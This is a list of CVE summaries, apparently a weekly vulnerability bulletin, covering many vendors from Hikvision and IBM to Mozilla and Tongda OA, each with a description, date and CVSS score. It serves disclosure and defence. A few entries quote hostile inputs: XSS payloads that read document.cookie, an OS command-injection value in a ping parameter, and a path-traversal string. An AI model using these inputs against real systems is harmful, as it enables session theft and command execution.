hcltech — connections | HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. | 2023-12-15 | 6.5 | CVE-2023-28022
hikvision — intercom_broadcast_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability. | 2023-12-17 | 6.5 | CVE-2023-6894
hikvision — intercom_broadcasting_system | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. | 2023-12-17 | 6.3 | CVE-2023-6895
hitachi_energy — rtu500_series_cmu | A vulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in a buffer overflow and, as a final consequence, a reboot of an RTU500 CMU. | 2023-12-19 | 5.9 | CVE-2023-6711
home_assistant — home_assistant | Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. | 2023-12-15 | 4.3 | CVE-2023-50715
ibm — aix | IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. | 2023-12-22 | 6.2 | CVE-2023-45165
ibm — aix | IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970. | 2023-12-19 | 6.2 | CVE-2023-45172
ibm — cloud_pak_for_business_automation | IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805. | 2023-12-18 | 4.9 | CVE-2023-40691
ibm — db2_mirror_for_i | IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim’s PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532. | 2023-12-18 | 5.3 | CVE-2023-47741
ibm — informix_jdbc | IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116. | 2023-12-20 | 6.3 | CVE-2023-35895
ibm — qradar_siem | IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372. | 2023-12-19 | 4.9 | CVE-2023-47146
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197. | 2023-12-20 | 5.3 | CVE-2023-47703
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522. | 2023-12-20 | 5.4 | CVE-2023-47707
ibm — security_guardium_key_lifecycle_manager | IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228. | 2023-12-20 | 4.3 | CVE-2023-47705
ibm — urbancode_deploy | An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509. | 2023-12-20 | 6.2 | CVE-2023-42012
ibm — urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510. | 2023-12-20 | 5.3 | CVE-2023-42013
ibm — urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799. | 2023-12-20 | 5.3 | CVE-2023-47161
ibm — urbancode_deploy | IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512. | 2023-12-19 | 4.3 | CVE-2023-42015
idemia — multiple_products | When handling contactless cards, a specific function used to get additional information from the card doesn’t check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. | 2023-12-15 | 6.8 | CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan — infinispan | A flaw was found in Infinispan’s REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. | 2023-12-18 | 6.5 | CVE-2023-3628
infinispan — infinispan | A flaw was found in Infinispan’s REST. Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. | 2023-12-18 | 4.3 | CVE-2023-3629
infinispan — infinispan-server | A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service. | 2023-12-18 | 4.4 | CVE-2023-5236
instipod — duouniversalkeycloakauthenticator | An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. A user logging in to Keycloak using the DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. | 2023-12-23 | 4.5 | CVE-2023-49594
insyde — insydeh2o | TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 before version 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. | 2023-12-16 | 4.7 | CVE-2022-24351
iscute — cute_http_file_server | Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page. | 2023-12-20 | 5.4 | CVE-2023-50639
i̇stanbul_soft_informatics_and_consultancy_limited_company — softomi_gelişmiş_c2c_pazaryeri_yazılımı | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Gelişmiş C2C Pazaryeri Yazılımı allows Reflected XSS. This issue affects Softomi Gelişmiş C2C Pazaryeri Yazılımı: before 12122023. | 2023-12-21 | 6.1 | CVE-2023-6122
jetbrains — intellij_idea | In JetBrains IntelliJ IDEA before 2023.3.2, code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration. | 2023-12-21 | 6.3 | CVE-2023-51655
jetbrains — youtrack | In JetBrains YouTrack before 2023.3.22268, the authorization check for inline comments inside thread replies was missed. | 2023-12-15 | 4.3 | CVE-2023-50871
kaifa — webitr_attendance_system | Kaifa Technology WebITR is an online attendance system. It has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read the database. | 2023-12-15 | 6.5 | CVE-2023-48395
kaifa — webitr_attendance_system | Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from an error message. | 2023-12-15 | 4.3 | CVE-2023-48393
kashipara_group — hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘adults’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. | 2023-12-20 | 5.4 | CVE-2023-49269
kashipara_group — hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_in_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. | 2023-12-20 | 5.4 | CVE-2023-49270
kashipara_group — hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_out_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. | 2023-12-20 | 5.4 | CVE-2023-49271
kashipara_group — hotel_management | Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘children’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. | 2023-12-20 | 5.4 | CVE-2023-49272
kodcloud — kodexplorer | Reflective Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51 allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. | 2023-12-19 | 6.1 | CVE-2023-49489
libtiff — libtiff | An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow, leading to an application crash. | 2023-12-18 | 5.5 | CVE-2023-6228
lightxun — iptv_gateway | A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579. | 2023-12-21 | 4.3 | CVE-2023-7026
linux — kernel | A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service. | 2023-12-21 | 4.4 | CVE-2023-7042
m-files_corporation — m-files_server | A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. An authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests. | 2023-12-20 | 6.5 | CVE-2023-6910
microsoft — edge_chromium | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | 2023-12-15 | 4.3 | CVE-2023-36878
microsoft — windows | Windows Local Session Manager (LSM) Denial of Service Vulnerability | 2023-12-20 | 6.5 | CVE-2022-44684
microweber — microweber | Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. | 2023-12-15 | 4.3 | CVE-2023-6832
moxa — iologik_e1200_series | A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. | 2023-12-23 | 6.5 | CVE-2023-5962
mozilla — firefox | A `<dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6869
mozilla — firefox | Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6872
mozilla — firefox | Multiple NSS NIST curves were susceptible to a side-channel attack known as “Minerva”. This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6135
mozilla — firefox | In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6868
mozilla — firefox | Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6870
mozilla — firefox | Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121. | 2023-12-19 | 4.3 | CVE-2023-6871
mozilla — firefox/firefox_esr | `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6865
mozilla — firefox/firefox_esr | The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. | 2023-12-19 | 6.1 | CVE-2023-6867
mozilla — multiple_products | The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 6.5 | CVE-2023-6860
mozilla — multiple_products | When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 5.3 | CVE-2023-6857
mozilla — thunderbird | The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6. | 2023-12-19 | 4.3 | CVE-2023-50761
mozilla — thunderbird | When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6. | 2023-12-19 | 4.3 | CVE-2023-50762
mr-corner — amazing_little_poll | Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the “lp_admin.php” file in the “question” and “item” parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading. | 2023-12-20 | 4.6 | CVE-2023-6769
netapp — ontap | ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. | 2023-12-15 | 4.6 | CVE-2023-27317
netapp — ontap_mediator | ONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API. | 2023-12-21 | 5.3 | CVE-2023-27319
nextcloud — security-advisories | Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. | 2023-12-22 | 5.4 | CVE-2023-49791
nextcloud — security-advisories | Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them to execute more authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. | 2023-12-22 | 5.3 | CVE-2023-49792
nextcloud — security-advisories | The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. | 2023-12-22 | 4.3 | CVE-2023-49790
openbsd — openssh | In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys. | 2023-12-18 | 5.5 | CVE-2023-51384
pedroetb — tts-api | A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability. | 2023-12-19 | 5.5 | CVE-2019-25158
phpgurukul — online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. | 2023-12-22 | 5.5 | CVE-2023-7054
phpgurukul — online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability. | 2023-12-21 | 4.3 | CVE-2023-7051
phpgurukul — online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. | 2023-12-22 | 4.3 | CVE-2023-7052
phpgurukul — online_notes_sharing_system | A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. | 2023-12-22 | 4.3 | CVE-2023-7055
phpmyfaq — phpmyfaq | Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. | 2023-12-16 | 5.4 | CVE-2023-6889
phpmyfaq — phpmyfaq | Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. | 2023-12-16 | 5.4 | CVE-2023-6890
progress_software_corporation — sitefinity | A malicious user could potentially use the Sitefinity system for the distribution of phishing emails. | 2023-12-20 | 4.7 | CVE-2023-6784
pymedusa — medusa | Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. | 2023-12-22 | 5.3 | CVE-2023-50258
pymedusa — medusa | Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. | 2023-12-22 | 5.3 | CVE-2023-50259
redhat — keycloak | A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode “form_post.jwt” which could be used to bypass the security patch implemented to address CVE-2023-6134. | 2023-12-18 | 6.1 | CVE-2023-6927
resque — resque | Resque (pronounced like “rescue”) is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 is vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0. | 2023-12-21 | 6.3 | CVE-2023-50724
resque — resque | Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1. | 2023-12-22 | 6.3 | CVE-2023-50725
resque — resque | Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. | 2023-12-22 | 6.3 | CVE-2023-50727
satellite — satellite | An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system’s integrity. | 2023-12-18 | 6 | CVE-2023-4320
silabs — z-wave_software_development_kit | A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. | 2023-12-15 | 6.5 | CVE-2023-5310
silicon_labs — gsdk | An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0. | 2023-12-21 | 4.6 | CVE-2023-41097
skupper_operator — skupper_operator | A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user’s purview. | 2023-12-18 | 6.8 | CVE-2023-5056
snowflakedb — snowflake-connector-net | The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. | 2023-12-22 | 6 | CVE-2023-51662
softnext — mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. | 2023-12-15 | 6.5 | CVE-2023-48381
softnext — mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. | 2023-12-15 | 6.5 | CVE-2023-48382
softnext — mail_sqr_expert | Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform a Blind SSRF attack to discover internal network topology based on URL error response. | 2023-12-15 | 5.3 | CVE-2023-48379
sourcecodester — simple_image_stack_website | A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255. | 2023-12-17 | 6.1 | CVE-2023-6896
sourcecodester — simple_student_attendance_system | A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. | 2023-12-22 | 6.3 | CVE-2023-7058
sudo — sudo | A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. | 2023-12-23 | 6.6 | CVE-2023-7090
systemd-resolved — systemd-resolved | A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. | 2023-12-23 | 5.9 | CVE-2023-7008
taiwan-ca — jcicsecuritytool | TAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. | 2023-12-15 | 6.1 | CVE-2023-48387
tcpreplay — tcpreplay | Within tcpreplay’s tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack. | 2023-12-21 | 5.5 | CVE-2023-4256
tongda — tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7020
tongda — tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7021
tongda — tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7022
tongda — tongda_office_anywhere | A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7023
uffizio — gps_tracker | An Open Redirection vulnerability in all versions of Uffizio’s GPS Tracker allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. | 2023-12-16 | 6.1 | CVE-2020-17484
uyumsoft — lioxerp | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146. | 2023-12-21 | 6.1 | CVE-2023-5988
uyumsoft — lioxerp | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146. | 2023-12-21 | 5.4 | CVE-2023-5989
w3m — w3m | An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition. | 2023-12-21 | 5.5 | CVE-2023-4255
wordpress — wordpress | Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1. | 2023-12-18 | 6.5 | CVE-2022-40312
